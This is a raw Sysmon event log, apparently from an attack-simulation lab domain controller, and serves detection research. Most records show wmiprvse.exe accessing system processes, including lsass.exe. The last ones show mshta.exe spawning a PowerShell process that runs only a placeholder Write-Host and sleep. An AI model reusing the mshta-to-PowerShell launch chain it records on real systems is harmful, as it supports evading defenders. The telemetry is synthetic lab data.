15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022239Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022238Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022237Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022236Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022235Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022234Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022233Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022232Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022231Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022809Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.445{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022808Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.445{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022807Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.398{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022806Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.398{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000022805Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.351{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vbn55yau.zk0.ps12021-01-20 15:59:14.351 10341000x800000000000000022804Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022803Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.304{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2D06-00000000A301}5924C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022802Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.304{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2D06-00000000A301}5924C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022801Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.304{7901BC46-5352-6008-2D06-00000000A301}59243836C:\Windows\system32\conhost.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022800Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.288{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5352-6008-2D06-00000000A301}5924C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022799Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022798Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022797Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022796Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022795Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.288{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022794Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.288{7901BC46-5352-6008-2B06-00000000A301}73167108C:\Windows\System32\mshta.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022793Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.293{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; 